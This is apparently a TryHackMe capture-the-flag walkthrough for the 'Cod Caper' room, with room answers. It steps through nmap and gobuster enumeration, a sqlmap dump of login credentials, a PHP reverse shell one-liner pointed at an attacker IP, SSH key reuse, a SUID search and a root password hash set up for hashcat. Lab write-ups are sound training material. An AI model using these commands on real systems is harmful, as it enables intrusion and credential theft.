My solution for the room called "The Cod Craper" in TryHackMe
https://tryhackme.com/room/thecodcaper
The first step is to see what ports and services are running on the target machine. Recommended Tool - nmap: Useful flags: -p -sC -A
To answer this questions we need to scan the machine with nmap and analyze the results
nmap -A <IP> -vv
We can see that there are two port open, 22 with ssh service and port 80 with http
Question 1: How many ports are open on the target machine?
2
Question 2: What is the http-title of the web server?
Apache2 Ubuntu Default Page: It works
Question 3: What version is the ssh service?
OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Question 4: What is the version of the web server?
Apache/2.4.18
Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available to access on the web server. Recommended tool: gobuster Useful flags: -x --url --wordlist
Recommended wordlist: big.txt
If we open the ip on a browser we can see that there is the default page of Apache2 Ubuntu
Now let's scan the ip with gobuster for enumerate some directories and files.
gobuster dir -u http://IP/ -w big.txt -x .php,.html,.txt
Here we are.. we found the important file !
Question 1 : What is the name of the important file on the server?
administrator.php
The admin page seems to give us a login form. In situations like this it is always worth it to check for "low-hanging fruit". In the case of login forms one of the first things to check for is SQL Injection.
Recommended Tool: sqlmap
Useful Flags: -u --forms --dump -a
On the page IP/administrator.php we have an administrator login
Let's try an SQL Injection with sqlmap
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-devbut first we need to intercept the http request with burpsuite
now save it in a .txt file and then launch sqlmap
sqlmap -r request.txt -D users --tables
Mmmh... interesting we found some databases :)
Let's check "users"
sqlmap -r request.txt -D users -T users --dump
Here are the username and password !
Question 1: What is the admin username?
Question 2: What is the admin password?
Question 3: How many forms of SQLI is the form vulnerable to?
3
It seems we have gained the ability to run commands! Since this is my old PC, I should still have a user account! Let's run a few test commands, and then try to gain access!
Now we have the credentials found with sqlmap
Let's do the log in
Ouch ... another form
Now let's try to get a reverse shell with netcat
but first prepare a php shell
php -r '$sock=fsockopen("YOUR IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Don't forget to run netcat on the attacking machine
If everything went well then we are inside the target machine
Question 1: How many files are in the current directory?
3
Question 2: Do I still have an account
yes
Question 3: What is my ssh password?
To answer this question I've searched into the machine
the path is the following
/var/hidden/pass
Question 1: What is the interesting path of the interesting suid file
My solution:
first connect to the ssh with the ssh key found in
/home/pingu/.ssh/id_rsa
put it in a .txt file and then log to the ssh
ssh -i ssh_key.txt pingu@IP
Now we have to found the path of the suid file a SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner.
I've searched on the internet and I found this command that permits to list all binaries with SUID permission.
find / -perm -u=s -type f 2>/dev/null
No answer needed
No answer needed
No answer needed
Now that we have the password hashes, we can crack them and get the root password! Recall from the previous outputs that our root password hash is
$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.
Usage: hashcat {flags} {hashfile} {wordlist}
Hint: the hashcat mode is 1800
Enjoy